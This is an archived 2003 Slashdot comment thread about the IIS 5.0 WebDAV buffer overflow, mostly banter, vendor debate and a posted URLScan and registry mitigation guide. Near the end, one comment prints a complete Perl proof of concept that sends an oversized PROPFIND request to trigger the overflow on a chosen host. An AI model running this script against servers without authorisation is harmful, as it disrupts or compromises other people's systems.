Become a fan of Slashdot on Facebook

 


Forgot your password?
Close
typodupeerror
×
Security Microsoft The Internet

WebDAV Buffer Overflow Attack Compromises IIS 5.0 384

Posted by timothy from the what-this-old-thing dept.
rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
This discussion has been archived. No new comments can be posted.

WebDAV Buffer Overflow Attack Compromises IIS 5.0 More

WebDAV Buffer Overflow Attack Compromises IIS 5.0

Comments Filter:

  • yup (Score:4, Funny)

    by Anonymous Coward on Monday March 17, 2003 @05:52PM (#5532118)
    (looks at watch) its monday again... time to go patch my IIS

    • Re:yup (Score:4, Funny)

      by Groo Wanderer ( 180806 ) <{charlie} {at} {semiaccurate.com}> on Monday March 17, 2003 @06:57PM (#5532665) Homepage
      Having to watch over a handfull of IIS machines for several companies, I can say, with some authority, that if you only patch weekly, you are in trouble. MS often releases several critical patches per week, get on the ball.

      -Charlie

      (This was origionally menat to be sarcasm, but then I wnet to the windows update and looked at the entire patch list, not the rollups. It really is as bad as I was thinking. As that great philosopher Pepe LaPew says, *LeSigh*.)

  • Patch? (Score:4, Funny)

    by Iamthefallen ( 523816 ) <Gmail name: Iamthefallen> on Monday March 17, 2003 @05:53PM (#5532119) Homepage Journal
    Better download those patches and fix another security hole.

    Well duh, "patch my IIS", it's monday isn't it?

  • Ugh (Score:5, Informative)

    by wizarddc ( 105860 ) on Monday March 17, 2003 @05:53PM (#5532123) Homepage Journal
    WebDAV has been a headache for for a long time, until I decided to just disable it altogther. I realized I never had a purpose for it, personally, so I added the disabling registry key [microsoft.com] too all my servers. If you know any good that WebDAV does, I'd like to know about it.

    • Comment removed (Score:5, Informative)

      by account_deleted ( 4530225 ) on Monday March 17, 2003 @05:57PM (#5532174)
      Comment removed based on user account deletion

      • Re:Ugh (Score:3, Insightful)

        by kjhambrick ( 111698 )
        .. cut ...

        Four things that make WebDav's so
        cool ...

        And don't forget to add ...

        WebDAV like SOAP makes it real easy
        for developers to sneak your data
        thru pesky firewalls using Port 80.

        That-a-Way, we can all share all our
        Corp Documents with the WFW ( Whole
        Effing World )

        -- kjh

    • Re:Ugh (Score:3, Informative)

      by Evil Grinn ( 223934 )
      If you know any good that WebDAV does, I'd like to know about it.

      Read the links in the posting:

      Microsoft Windows 2000 supports the World Wide Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV, defined in RFC 2518, is a set of extensions to the Hyper Text Transfer Protocol (HTTP) that provide a standard for editing and file management between computers on the Internet. A security vulnerability is present in a Windows component used by WebDAV, and results because the component contains an

    • Re:Ugh (Score:5, Interesting)

      by Mexican ( 323519 ) on Monday March 17, 2003 @06:16PM (#5532336)
      Is it just me, or did anyone happen to download and extract the patch and notice that it does not seem to contain the webdav .dll but just ntdll.dll? So is it really a patch to WebDav or for something in ntdll.dll that webdav relies on?

      • Re:Ugh (Score:5, Informative)

        by questionlp ( 58365 ) on Monday March 17, 2003 @06:49PM (#5532594) Homepage
        According to the Microsoft bulletin (here [microsoft.com]):
        What's wrong with the way IIS 5.0 handles WebDAV requests?

        WebDAV uses IIS to pass requests to and from Windows 2000. When IIS receives a WebDAV request, it typically processes the request and then acts on it. However, if the request is formed in a particular way, a buffer overrun can result because one of the Windows components called by WebDAV does not correctly check parameters.

        It sounds like WebDAV sends a malformed request back to the ntdll.dll for additional processing and possibly authentication (?) that is the problem. My guess is that the root of the problem is in ntdll.dll, but it could be mitigated by filtering WebDAV requests using the URLScan [microsoft.com] utility. More information can be had about 2/3 the way down in the same bulletin linked above.

        HTH

  • When they get a bug free Windows, they'll have to put some in just so bored /. readers have something to laugh at....

  • Bah, the Internet (Score:5, Funny)

    by Captain Beefheart ( 628365 ) on Monday March 17, 2003 @05:54PM (#5532132)
    I don't know why anyone uses it anymore. I'm switching back to Morse Code. Who's with me?

  • Again... (Score:3, Interesting)

    by Anonymous Coward on Monday March 17, 2003 @05:55PM (#5532149)
    A buffer overflow allowing an entire system takeover... Why is the code that the web server has access to change allowed to take over the system?

    • Re:Again... (Score:5, Funny)

      by zzxc ( 635106 ) on Monday March 17, 2003 @05:59PM (#5532194)
      >Why is the code that the web server has access to
      >change allowed to take over the system?

      Because it is "trusted".

    • Re:Again... (Score:3, Insightful)

      by GunFodder ( 208805 )
      Because otherwise it wouldn't be "integrated" into the OS and therefore might be an illegal attempt to use an existing monopoly to propagate another one (see IE for further details). Although it looks like IIS is too late and Apache has already won the day for open source.

  • Gartner Group (Score:5, Insightful)

    by 1010011010 ( 53039 ) on Monday March 17, 2003 @05:56PM (#5532156) Homepage
    If you listened to the Gartner Group, you stopped using IIS last year.

    If you didn't, well, get with the program!

    Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.

  • Why use IIS? (Score:2, Insightful)

    by Blaine Hilton ( 626259 )
    All of these "patch" issues should be listed and sent to management with a recommediation of switching to a more secure *nix alterntive. When will the truth beat out the Microsoft ad machine?

    • Re:Why use IIS? (Score:3, Flamebait)

      by Len ( 89493 )
      Would you also send them the list of Apache security alerts? [apacheweek.com] Or is that too much truth for you?
      • Aside from both of you being a little hopeful that anyone with a C and an O in their title would even read these missives from their proles . . .

        I'd send them a list of both, along with a list of patch availability time for each hole that was patched, and a list of holes that still remain unpatched.

        Frankly, the thing that steams my giblets the most about IIS is the unalterable GMT time-stamping on the W3C log format coupled with the inability to customize the other available (non-GMT stamping) log forma

      • Apache security alerts? (Score:5, Insightful)

        by burgburgburg ( 574866 ) <splisken06NO@SPAMemail.com> on Monday March 17, 2003 @06:32PM (#5532455)
        Would you also send them the list of Apache security alerts [apacheweek.com]? Or is that too much truth for you?

        All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!

        • I love that list of vulns for apache!

          Not only are they older, they almost all have one thing in common: they are for apache on Win32.

          Only one or two of the seven affected a UNIX platformed apache.

          It seems that the vulns for Win32 revolve around getting the '/' vs '\' right and how they do their path checking.

  • OMG! (Score:4, Funny)

    by Anonymous Coward on Monday March 17, 2003 @05:56PM (#5532160)
    Cue 2,000 microsoft bashing messages...

    • Re:OMG! (Score:5, Funny)

      by NewbieProgrammerMan ( 558327 ) on Monday March 17, 2003 @05:59PM (#5532193)
      I hope you don't have a static buffer allocated for those messages, because it'll....ummm...overflow. <ducks>
      • I hope you don't have a static buffer allocated for those messages, because it'll....ummm...overflow.

        If it was static (in the C sense), an overflow wouldn't smash the stack and there would be no exploit. ;-)

        • Re:OMG! (Score:3, Informative)

          by btellier ( 126120 )
          A joke, but just so other people are clear other segments of memory are vulnerable to overflows as well:

          - .bss section: for uninitialized data. In this exploit [securityfocus.com] I smashed a buffer in .bss space that ended up overwriting a function pointer in the .dtors section (IIRC, this was many years ago). Upon exit this function was called and ran a shell.

          - .data section: for initialized data. In this one [securityfocus.com] I was able to overflow a set of character pointers in the xlock (screensaver) program. By overflowing them with

  • Hi everybody! (Score:4, Insightful)

    by Anonymous Coward on Monday March 17, 2003 @05:56PM (#5532161)
    Slashdot is not the place you want to read about things like this, if you really need / want to be on the ball. You need to subscribe to bugtraq and nanog. You'd be surprised... it's like knowing the future!

  • I am kind of impressed (Score:5, Interesting)

    by obotics ( 592176 ) <remline@hotmail.com> on Monday March 17, 2003 @05:56PM (#5532162) Homepage
    Wow! Microsoft already has a patch released? Not bad at all!

    Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendancy to run unpatched machines.


    • Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendancy to run unpatched machines.

      Many of these unpatched boxes are even windows machines. ;)
      (No, I'm not slamming windows, or *n?x; but bad admin practices.)

    • Don't be! (Score:5, Insightful)

      by FreeLinux ( 555387 ) on Monday March 17, 2003 @06:13PM (#5532317)
      The exploit has been in the wild since last Wednesday. Microsoft has known about it since that time. Five days to a patch is really good for Microsoft but, the last Apache bug was fixed on the day of discovery, long before any exploits appeared.

      • Slight problem with that (Score:5, Interesting)

        by Groo Wanderer ( 180806 ) <{charlie} {at} {semiaccurate.com}> on Monday March 17, 2003 @07:03PM (#5532707) Homepage
        The problem with this patch is that it wasn't found by a white hat and submitted. It was discovered by people getting hacked and calling MS asking WTF. In cases like that, 5 days isn't really that bad. In cases where an exploit, along with vulnerability code, and a description are fed to devs on a platter, open source or not, it makes the task 10x easier. When you have to figure out what is going on while under fire, and in a hurry, things get messy. That said, you can hack a lot of systems in 5 days with the right script.

        -Charlie

    • Re:I am kind of impressed (Score:5, Insightful)

      by joyoflinux ( 522023 ) <thejoyoflinux AT yahoo DOT com> on Monday March 17, 2003 @06:30PM (#5532437)
      Some admins run unpatched machines because they're more scared of what damage the patch will do than the security hole...

  • MSNBC Posted this article... (Score:5, Informative)

    by wumarkus420 ( 548138 ) <wumarkus@h o t mail.com> on Monday March 17, 2003 @05:57PM (#5532169) Homepage
    It looks like this was the exploit used to hack into an Army machine recently. Check out the link from MSNBC here [msnbc.com].

  • I'd uninstall it but... (Score:5, Funny)

    by OffTheLip ( 636691 ) on Monday March 17, 2003 @05:58PM (#5532180)
    I was ready to uninstall IIS when it occured to me that Exchange 2K needs it. I was ready to uninstall Exchange 2K when I realized users would not be able to function. Whew, luckily I came to my senses...

  • Q: WebDAV is Real? (Score:3, Interesting)

    by 4of12 ( 97621 ) on Monday March 17, 2003 @05:58PM (#5532185) Homepage Journal

    So is this any kind of standard WebDAV [webdav.org] or just a particular proprietary implementation of similar features in IIS?

    I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.

    • Re:Q: WebDAV is Real? (Score:5, Informative)

      by greed ( 112493 ) on Monday March 17, 2003 @06:29PM (#5532433)
      I've mounted WebDAV filesystems with my iBook, served by a Solaris machine with Apache and subversion. Even mounts under /Volumes, so programs don't even need to be aware of it; the XP "redirector" would fill this same role. (UNIX people can think "virtual filesystem switch" when you hear "redirector".)

      If you just want a DAV filesystem, see mod_dav_fs in any recent Apache. (Which DOES run on Windows, for everyone who wants to toss the OS out with the webserver. Not that I'm a fan of Windows for anything, but you can run non-MS servers on the thing.)

  • A quite-interesting report on MSNBC (Score:4, Interesting)

    by expro ( 597113 ) on Monday March 17, 2003 @06:00PM (#5532201)

    It seems quite likely to me that that was an under-reported version of this incident [msnbc.com] reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.

  • Its a bug...so what? (Score:4, Insightful)

    by KingDaveRa ( 620784 ) on Monday March 17, 2003 @06:00PM (#5532208) Homepage
    So, ok, this is a bug. A serial vulnerability. It could lead to a server being crippled. Its all Microsoft's fault. Its crap software. Etc Etc.

    Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.

    I treat all servers fairly, regardless of background, age or reliability :-)

    • Imagine an equivalent (Score:5, Informative)

      by Anonymous Coward on Monday March 17, 2003 @06:25PM (#5532398)

      The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.

      Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.

      Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.

      So, in summary:

      Its all Microsoft's fault. Its crap software.

      That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.

  • CERT can save money... (Score:4, Funny)

    by huhmz ( 216967 ) on Monday March 17, 2003 @06:05PM (#5532247)
    If CERT would just move their headquarters to the IIS devs room in redmond, that would probably save a lot of money for CERT. They should be a part of the regular IIS dev team.
  • Where I work in the weekend someone hacked a web server with this, and just finished to check that was because something related with frontpage or dav when I saw this article. I was about to put on fire to the administrators of that server, but at least that was not entirely their fault.

    That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft is aware of this and making the patch, but if it have time to be developed an exploit

    • Microsoft learned of the vulnerability after online hackers used the flaw to breach the security of a customer's Web servers last Wednesday
      Looks like "black hats" were the first to find this bug, at least according to C|NET.

  • did anyone read the microsoft bulletin... (Score:5, Insightful)

    by Anonymous Coward on Monday March 17, 2003 @06:07PM (#5532270)
    It says near the bottom that IIS systems with URL scan which is part of the lockdown utility are not affected by this.

    Why would you run a IIS server without using the lockdown utility??

    We (large corporation) have been using IIS servers and without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.

    I think this story is a bit overblown. It appears that most /.'s don't like microsoft and thats sad because microsoft is the driving company behind many many jobs. The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.

    cheers
    John

    • Sorry for feeding the trolls, but (Score:4, Insightful)

      by expro ( 597113 ) on Monday March 17, 2003 @06:33PM (#5532470)

      Your first three paragraphs were quite good and interesting.

      Your fourth is full of idiocy.

      I think this story is a bit overblown. Umm, not at all. It is quite a serious incident.

      It appears that most /.'s don't like microsoft

      Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?

      and thats sad because microsoft is the driving company behind many many jobs They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.

      They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.

      The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.

      You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.

      But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?

    • I think this story is a bit overblown. It appears that most /.'s don't like microsoft and thats sad because microsoft is the driving company behind many many jobs.

      Uhm, you do realize that this is Slashdot, right? Of course you do... you cite /. right there. I'm confused here. I feel like someone just told me the sky is blue.

      You are right though, Microsoft products can be secure. Just like Linux products can be insecure. The difference is in the default.
    • The arrival of windows pushed the last boom. No questions about that.

      Yeah, that's why the stock everyone was talking about in 1995 was netscape communications corp. The WEB was the last boom. No questions about that.
    • >Unix had been around for 20 yrs and no boom.

      The PC boom was dependant on the web/internet boom. Any OS can run a browser, it just happened that Microsoft was the de facto standard on the PC platform at the time.

      If you want to thank anyone for ushering the information age you can start with UIUC's NCSA and Tim Berners-Lee.
    • ummm, while i agree slashdot is slanted against microsoft, you can't say 'windows' pushed a boom. it pushed a new market, yes. but thats like claiming any invention that has widespread use caused the world to become something new. no shit, the product was new. unix didnt have desktop use, no. but who the hell do you think has been running the corporate machines the past 30 years? who do you think is still relied upon for the real important data crunching. it aint win2k thats for sure. dont confuse a new mar

    • Why would you run a IIS server without using the lockdown utility??

      Good point. However, my company advises our clients against running it, mainly because their sysadmins are...not well versed in the arts of running a windows web server. The default configuration for the lockdown tool shuts down everything except for HTML. That includes the ASP engine, which our product requires. If the sysadmin spends a few minutes to go through the list of what to disable and what not to, they're fine.

      Sadly, our c

  • What aspects of URLScan provide protection (Score:4, Interesting)

    by mattsouthworth ( 24953 ) on Monday March 17, 2003 @06:09PM (#5532285) Journal
    I've asked this everywhere, maybe someone will answer.

    The MS advisory states that a 'default' URLScan will protect against this. Well ... We don't run the default config. We've customized it, as have many shops. I can't find information on _which_ aspects of URLScan provide the protection - I'd like to know if our customizations have left us out in the breeze.

    Anyone know?

    • Re:What aspects of URLScan provide protection (Score:5, Informative)

      by mattsouthworth ( 24953 ) on Monday March 17, 2003 @06:15PM (#5532323) Journal
      A-ha! More info posted to NTBugtraq (after my original posting..)

      Quote:
      Just to clarify, Microsoft's bulletin states that this vulnerability
      could have been prevented using URLScan and/or IISLockdown, but it
      isn't really specific on how to do this. Several people have asked me
      how this can be done.

      The following steps can be used to block the attack:

      1. Completely disable WebDAV by setting the
      HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\ Param eters\DisableWebDAV
      registry key to 1

      2. Limit the length of requests (the url and any headers) by setting
      the HKLM\SYSTEM\CurrentControlSet\Services\w3svc\param eters
      MaxClientRequestBuffer to something like 16k

      3. Block the following WebDAV HTTP verbs using URLScan (either by
      specifically blocking them or by not listing them as allowed):
      OPTIONS, PROPFIND, PROPPATCH, MKCOL, DELETE, PUT, COPY, MOVE, LOCK,
      UNLOCK, OPTIONS, and SEARCH. Note that FrontPage does require the
      OPTIONS method to work properly.

      4. Block the following WebDAV-related headers using the [DenyHeaders]
      section of URLScan.ini:
      [DenyHeaders]
      DAV:
      Depth:
      Destina tion:
      If:
      Label:
      Lock-Token:
      Overwrite:
      TimeO ut:
      TimeType:
      DAVTimeOutVal:
      Other:

      5. If you require WebDAV, you can limit the
      length of each individual header with these entries in the
      [RequestLimits] section (The exact values are obviously pretty
      generic and may need to be increased or decreased based on your
      particular configuration):
      [RequestLimits]
      Max-DAV=250
      Max -Depth=250
      Max-Destination=250
      Max-If=250
      Max-L abel=250
      Max-Lock-Token=250
      Max-Overwrite=250
      M ax-TimeOut=250
      Max-TimeType=250
      Max-DAVTimeOutVa l=250
      Max-Other=250

      Microsoft does not specifically state which HTTP Verb and/or header
      is affected, but it does say that it is related to WebDAV. I would
      therefore assume that setting ACLs on httpext.dll would still be
      effective in blocking the attack. The PUT and DELETE methods are
      still available in IIS, but only as part of the original HTTP spec,
      not part of WebDAV.

      Mark Burnett
      www.iissecurity.info

  • Exploited! (Score:5, Funny)

    by DarkHelmet ( 120004 ) <mark&seventhcycle,net> on Monday March 17, 2003 @06:11PM (#5532298) Homepage
    Microsoft says that this is already being exploited, at the very least since last Wednesday.

    And I thought that Penguin on the Microsoft home page looked at little out of place.

  • timely patches (Score:2, Interesting)

    by boarder ( 41071 )
    I think one critical issue with the timings of patch releases is stated right up there in the post: exploits are already out and about... for 3 days!

    I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.

    If there is some cracker out there that has found this bug,

  • Glad to see they noticed it (Score:2, Interesting)

    by Anonymous Coward
    At least the noticed that an exploit exists. Sure, it may take a little while to make a patch, but at least there will be a fix soon. Hopefully, this should increase the overall security of IIS, which would of course be a good thing.

    Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it.
  • ... instead of having stories like these every two or three weeks just automatically reposted the same story? Really.... IIS vulnerabities are being discovered so often these days that it doesn't even feel like news anymore.

  • National Security (Score:5, Funny)

    by blueZhift ( 652272 ) on Monday March 17, 2003 @06:28PM (#5532418) Homepage Journal

    In a future near you...

    By order of John Ashcroft, Dick Cheney, and Bill Gates, Windows bugs are now a matter of national security. All discussion in this thread is to stop immediately!

    ---

    Seriously, with the Army getting hacked and the continued insistence of elements of the govt and military to use Windows, soon bugs and exploits will be classified as state secrets and we'll stop hearing about them. Soon enough vested FBI agents will be knocking on the door of anyone who opens their mouth...excuse me, someone's at the door...

    =======rrrrtwjstoah;!!!!!!!!!

  • I wonder if it's related to this intrusion.. (Score:4, Insightful)

    by TheNarrator ( 200498 ) on Monday March 17, 2003 @06:32PM (#5532462)
    http://www.msnbc.com/news/886524.asp?0cv=CB20

    March 17 -- A computer intruder armed with a secret, particularly effective attack tool recently took control of an Army Web server, MSNBC.com has learned. Both Microsoft and the CERT Coordination Center released hastily-prepared warnings about the vulnerability that led to the attack on Monday. But it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise.

  • This is perfect! (Score:2, Funny)

    by dze ( 89612 )

    I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!

  • Quite handy solution (Score:5, Informative)

    by decarelbitter ( 559973 ) on Monday March 17, 2003 @06:36PM (#5532490)
    If you have to use IIS for some reason, put a Squid proxy [squid-cache.org] running on your favorite OS in front of it. It will save you a lot of trouble.

  • Doesn't help at all (example) (Score:4, Interesting)

    by Wolfier ( 94144 ) on Monday March 17, 2003 @06:54PM (#5532642)
    Incompetent sysadmins still are the weakest link.

    Take a look at the World Health Organization South-East Asia web site:

    http://w3.whosea.org/index.htm

    They're running IIS 4.0. FOUR.POINT.ZERO.

    The deface has been there for almost a day with apparently no fix yet :(

    • Re:Doesn't help at all (example) (Score:5, Insightful)

      by the eric conspiracy ( 20178 ) on Monday March 17, 2003 @07:10PM (#5532770)
      Incompetent sysadmins still are the weakest link.

      I don't agree with that. Microsoft itself can't keep up with the patch schedules; its servers regularly get hacked. Who has more resources than Microsoft? Nobody.

      The fact is that if you are running a mission critical server you must test before deploying a patch. That takes time and money that the IT group has in short supply these days.

      Then there is the issue of Microsoft's marketting - they sell IIS as the easy to use 'zero maintenance' lowest TCO choice. False advertising in this case.

  • Windows Update (Score:3, Informative)

    by fudgefactor7 ( 581449 ) on Monday March 17, 2003 @06:56PM (#5532657)
    You know, if people periodically checked Windows Update, this would not be that big of a deal; additionally, if you have SP3 installed you can tell it to automagically install any critical updates for you without prompting. Case solved.

  • Editorial bias? (Score:5, Insightful)

    by m00nun1t ( 588082 ) on Monday March 17, 2003 @07:11PM (#5532784) Homepage
    Sure, another MS exploit. Seems to be one almost every week, and it sucks.

    What I do find interesting is that /. chose to post this article, but reject an article I submitted yesterday about a very serious security hole in Opera [internetnews.com] - Opera describe it as "extremely critical".

    I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".

    Just more of /. displaying an unfair bias?

  • In Related News.... (Score:3, Insightful)

    by Chester K ( 145560 ) on Monday March 17, 2003 @08:29PM (#5533299) Homepage
    While this makes the front page so we can all have our obligatory cracks at Microsoft, a similar (and just as important!) remote root exploit in Samba was just fixed [theregister.co.uk] today.

  • Thanks guys! (Score:3, Interesting)

    by Matey-O ( 518004 ) <michaeljohnmiller@mSPAMsSPAMnSPAM.com> on Monday March 17, 2003 @09:48PM (#5533687) Homepage Journal
    In your enthusiasm to slam Microsoft, I get a Really Good Feel for when a patch is critical or not. It lets me ignore the servers until a front page Slashdot article shows up.

    So, Danke!

  • Exploit Code (Karma Whoring) (Score:3, Informative)

    by thedji ( 561789 ) <dotslasl@wiCOUGARcked.dj minus cat> on Tuesday March 18, 2003 @03:05AM (#5535003) Homepage
    Test your server...

    #!/usr/bin/perl
    # Written by Georgi Guninski
    use IO::Socket;
    print "IIS 5.0 propfind\n";
    $port = @ARGV[1];
    $host = @ARGV[0];
    sub vv()
    {
    $ll=$_[0]; #length of buffer
    $ch=$_[1];
    $over=$ch x $ll; #string to overflow
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
    #$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    # ^^^^ This is another issue and also works with length ~>65000
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,300);
    #print "r=".$res;
    close $socket;
    }
    do vv(128008,"V"); # may need to change the length
    sleep(1);
    do vv(128008,"V");
    print "Done.\n";

Slashdot Top Deals

"Here's something to think about: How come you never see a headline like `Psychic Wins Lottery.'" -- Comedian Jay Leno

Close